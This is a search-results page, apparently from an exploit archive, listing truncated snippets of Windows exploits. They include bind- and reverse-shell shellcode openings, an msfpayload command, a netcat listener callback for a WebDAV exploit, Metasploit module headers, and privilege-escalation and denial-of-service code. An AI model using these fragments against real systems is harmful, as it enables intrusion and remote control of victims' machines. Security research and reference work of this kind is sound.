41 matches found
Windows/x64 - Bind Shell TCP Shellcode (508 bytes)
/ Title : Windows x64 Bind Shell TCP Shellcode size : 508 bytes Date : 08-12-2016 Author : Roziul Hasan Khan Shifat Tested On : Windows 7 Professional x64 / / section .text global start start: xor rdx,rdx mov rax,gs:rdx+0x60 mov rsi,rax+0x18 mov rsi,rsi+0x10 lodsq mov rsi,rax mov r14,rsi+0x30...
Windows/x86 - Persistent Reverse Shell TCP (494 Bytes)
/ Title : Windows x86 persistent reverse shell tcp Author : Roziul Hasan Khan Shifat Date : 04-09-2016 Tested on : Windows 7 x86 / / Note : This program must be run as adminstrator for 1st time . otherwise it won't be persistent / / section .text global start start: xor ecx,ecx mov eax,fs:ecx+0x3...
Design/Logic Flaw
Multiple untrusted search path vulnerabilities in cURL and libcurl before 7.49.1, when built with SSPI or telnet is enabled, allow local users to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse 1 security.dll, 2 secur32.dll, or 3 ws232.dll in the application or current...
CVE-2016-4802
Multiple untrusted search path vulnerabilities in cURL and libcurl before 7.49.1, when built with SSPI or telnet is enabled, allow local users to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse 1 security.dll, 2 secur32.dll, or 3 ws232.dll in the application or current...
MP3-Nator-Buffer-Overflow
Exploit Title: Exploit Buffer Overflow MP3-Nator SEH - DEP BYPASS Date: 18-11-2010 Author: Muhamad Fadzil Ramli Credit/Bug Found By: C4SS!0 G0M3S Software Link: http://files.brothersoft.com/mp3audio/players/mp3nator.zip filename = 'crash.plf' ./msfpayload windows/exec CMD=calc EXITFUNC=seh R |...
Alt-N WebAdmin 2.0.x USER Parameter Buffer Overflow Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/8024/info Alt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges. /...
MS Windows WebDAV - (ntdll.dll) Remote Exploit
No description provided by source. // / Crpt ntdll.dll exploit trough WebDAV by kralor Crpt / / --------------------------------------------------------------- / / this is the exploit for ntdll.dll through WebDAV. / / run a netcat ex: nc -L -vv -p 666 / / wb server.com yourip 666 0 / / the...
ComSndFTP 1.3.7 Beta - USER Format String (Write4) Vulnerability
No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit...
WireShark < 0.99.6 MMS Remote Denial of Service Exploit
No description provided by source. include winsock2.h include stdio.h pragma commentlib, ws232 char http = POST / HTTP/1.0\r\n Content-Type: application/vnd.wap.mms-message\r\n; char hoststr = Host: %s:%d\r\n; char contentlenstr = Content-Length: %d\r\n\r\n; unsigned char mms =...
HCView WriteAV Crash Proof Of Concept
!/usr/bin/perl Hardcoreview WriteAV Arbitrary Code Execution Author: Jean Pascal Pereira Vendor URI: http://sourceforge.net/projects/hardcoreview/ Vendor Description: Image browser. Designed and created for profesional and amature watching image files. All kind of image files ; . Support .jpg,...
ComSndFTP v1.3.7 Beta USER Buffer Overflow
Exploit for windows platform in category remote exploits $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require...
ComSndFTP 1.3.7 Beta - USER Format String (Write4) (Metasploit)
$Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 'ComSndFTP v1.3.7 Beta USER Buffe...
ComSndFTP 1.3.7 Beta USER Format String (Write4)
$Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' class Metasploit3 'ComSndFTP v1.3.7 Beta USER Buffe...
ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability
This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially crafted format string specifier as a username. The crafted username is sent to the server to overwrite the hardcoded function pointer from Ws232.dll!WSACleanup. Once this function pointer is triggered, the cod...
MS11-080 Afd.sys Privilege Escalation Exploit( CVE-2011-2005)
No description provided by source. MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit Author: [email protected] - Matteo Memelli Spaghetti & Pwnsauce yuck! 0xbaadf00d Elwood@mac&cheese.com Thx to dookielifesaver2000ca, dijital1 and ronin for helping out! To my Master Shifu muts: "So...
MS11-080 Afd.sys Privilege Escalation Exploit
Exploit for windows platform in category local exploits MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit Author: email protected - Matteo Memelli Spaghetti & Pwnsauce yuck! 0xbaadf00d email protected&cheese.com Thx to dookielifesaver2000ca, dijital1 and ronin for helping out! To my...
Microsoft Windows XP - afd.sys Local Kernel Denial of Service
Microsoft Windows XP - afd.sys Local Kernel Denial of Service //////////////////////////////////////////////////////////////////////////// // // Title: Microsoft Windows xp AFD.sys Local Kernel DoS Exploit // Author: Lufeng Li of Neusoft Corporation // Vendor: www.microsoft.com // Vulnerable:...
MP3-Nator Buffer Overflow SEH-DEP Bypass
Exploit Title: Exploit Buffer Overflow MP3-Nator SEH - DEP BYPASS Date: 18-11-2010 Author: Muhamad Fadzil Ramli - mind1355atgmaildotcom Credit/Bug Found By: C4SS!0 G0M3S Software Link: http://www.brothersoft.com/d.php?softid=16524&url=http://files.brothersoft.com/mp3audio/players/mp3nator.zip...
MP3-Nator Buffer Overflow (SEH - DEP BYPASS)
Exploit for windows platform in category local exploits ============================================ MP3-Nator Buffer Overflow SEH - DEP BYPASS ============================================ Exploit Title: Exploit Buffer Overflow MP3-Nator SEH - DEP BYPASS Date: 18-11-2010 Author: Muhamad Fadzil...
MP3-Nator - Local Buffer Overflow (SEH) (DEP Bypass)
Exploit Title: Exploit Buffer Overflow MP3-Nator SEH - DEP BYPASS Date: 18-11-2010 Author: Muhamad Fadzil Ramli - mind1355atgmaildotcom Credit/Bug Found By: C4SS!0 G0M3S Software Link: http://www.brothersoft.com/d.php?softid=16524&url=http://files.brothersoft.com/mp3audio/players/mp3nator.zip...